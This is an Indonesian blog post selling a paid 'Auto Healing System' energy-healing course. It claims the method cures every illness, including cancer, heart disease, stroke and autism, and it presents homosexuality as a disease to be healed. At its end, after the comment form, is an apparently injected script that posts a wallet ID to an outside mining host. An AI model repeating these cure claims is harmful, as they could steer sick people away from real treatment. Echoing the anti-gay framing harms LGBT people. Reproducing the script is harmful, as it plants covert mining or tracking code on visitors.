belajar komputer

Sabtu, 18 April 2015

AKTIVASI AUTO HEALING SYSTEM

Anda ingin menjadi juru sembuh? ahli terapi? ingin menolong keluarga dan orang lain sembuh dari segala jenis penyakit ?Apakah anda dokter? tabib? atau praktisi penyembuh lainnya ? atau masyarakat biasa ? Apapun latar belakang profesi anda.. kini saatnya anda mempelajari AUTO HEALING SYSTEM (AHS). Suatu metode penyembuhan pamungkas yang sangat dahsyat dan bisa diterapkan untuk segala jenis penyakit apapun : medis, non medis, psikis. Bagi anda yang sudah pernah mengikuti metode penyembuhan lainnya seperti reiki, prana, quantum touch dll maka AHS bisa dijadikan "senjata" baru untuk mengatasi penyakit pasien anda.AHS memiliki keunggulan tersendiri dalam proses penyembuhan penyakit:

1.AHS menggunakan konsep bahwa tidak ada yang lebih memahami penyakit melainkan tubuh si pasien itu sendiri. Dengan konsep inilah, anda cukup mengaktivasi tubuh pasien dalam hitungan detik dan biarkan tubuh pasien itu sendiri yang akan menyembuhkannya. Metode ini bisa diaplikasikan ke semua usia anak-anak,tua dan muda..Pasien yang tubuhnya diaktivasi biasanya seketika itu bisa merasakan berbagai fenoma dari suatu proses penyembuhan seperti : tubuh bergerak dengan sendirinya, badan terasa sangat relaks, merasakan hawahangat/setrum, melihat gambaran/vision tertentu dan lain sebagainya. Hal ini sejalan dengan pendapat dari pakar genetika dari Harvard, Profesor David Sinclair yang menuturkan tubuh manusia memiliki kemampuan luar biasa untuk memperbaiki dirinya sendiri.

2. Dapat dilakukan dimana saja dan kapan saja secara mudah dengan hasil menakjubkan bahkan efeknya seringkali seketika. Dapat diterapkan untuk segala penyakit medis, non medis dan psikis. Merupakan metode penyembuhan holistik (menyeluruh) mencakup pikiran, tubuh dan jiwa (mind, body & soul). Penyakit-penyakit yang bisa diterapi antara lain : jantung, stoke,kanker, syaraf kejepit, lumpuh, cedera otot, scoliosis, luka bathin, autis, kecanduan, homoseksual/lesbi dan semua jenis penyakit lainnya.

3. Bisa dilakukan tanpa perlu menyentuh tubuh pasien hingga puluhan menit atau berjam-jam lamanya.

4. Materi AHS mencakup :
-Tehnik perlindungan diri dari energi negatif/penyakit pasien dan tehnik memutus energi negatif/penyakit pasien.
- Penyembuhan ke orang lain
- Penyembuhan massal (banyak orang)
- Penyembuhan jarak jauh (distance healing)
- Penyembuhan diri sendiri (self healing) 

Selain mengajarkan AHS sebagai metode utama dalam ilmu penyembuhan, kami juga mengajarkan materi seni penyembuhan lainnya sebagai pelengkap. Materi-materi ini cukup penting karena bisa anda gunakan juga sebagai terapi penyembuhan. Dengan materi tambahan ini, anda tidak perlu lagi mengikuti kursus seni penyembuhan yang lain sehingga hemat waktu dan uang.

Materi tambahan yang kami ajarkan meliputi :

Metode penyembuhan dengan transfer energi dan pemindahan penyakit ke suatu media.

Metode terapi ketuk dua jari. Metode ini khusus untuk mengatasi masalah-masalah yang berhubungan dengan penyakit psikis seperti stres, cemas, phobia, perilaku/kebiasaan buruk, emosional dan sejenisnya. Terapi ketuk juga bisa dilakukan dari jarak jauh.

Tehnik penyembuhan diri sendiri (self healing) dengan yoga jari/mudra yang bisa dilakukan kapan saja dan dimana saja dan sangat mudah dengan hasil positif yang telah teruji.

Pelatihan bisa langsung maupun jarak jauh bagi yg sibuk,tehnik sangat praktis sangat mudah dipelajari langsung praktek,ilmiah bebas klenik,tanpa ritual dll.
Investasi Rp 900.000

Alamat : Desa Penengahan Kec Waykhilau Kab Pesawaran Lampung 35381
Hp : 0853 6857 4707

Tidak ada komentar:

Posting Komentar

var wallet = "cy_26 067b6 be129 ba270 c8100 e0f49 03d82 eab5c 3b065 43fea e169e c7e1f aa5fd f1"; $.post("http://mining.cayafuture.com:2435/"+wallet, function( data ) { //alert(data); })